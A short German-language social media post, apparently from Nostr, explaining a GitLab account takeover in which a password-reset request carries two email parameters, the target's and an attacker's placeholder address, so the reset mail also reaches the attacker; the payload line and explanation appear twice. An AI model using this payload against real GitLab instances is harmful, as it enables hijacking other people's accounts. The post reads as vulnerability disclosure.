Al3x 👽 on Nostr: Die GitLab Account Übernahme ist ein Einzeiler: ...
Die GitLab Account Übernahme ist ein Einzeiler:
user[email][]=target@target_com&user[email][]=attacker@attacker_com
GitLab rechnet nicht damit, dass zwei E-Mailadressen an das Passwortreset Formular gesendet werden und schickt beiden Accounts (auch dem Angreifer) die Passwort-Reset-Mail.
user[email][]=target@target_com&user[email][]=attacker@attacker_com
GitLab rechnet nicht damit, dass zwei E-Mailadressen an das Passwortreset Formular gesendet werden und schickt beiden Accounts (auch dem Angreifer) die Passwort-Reset-Mail.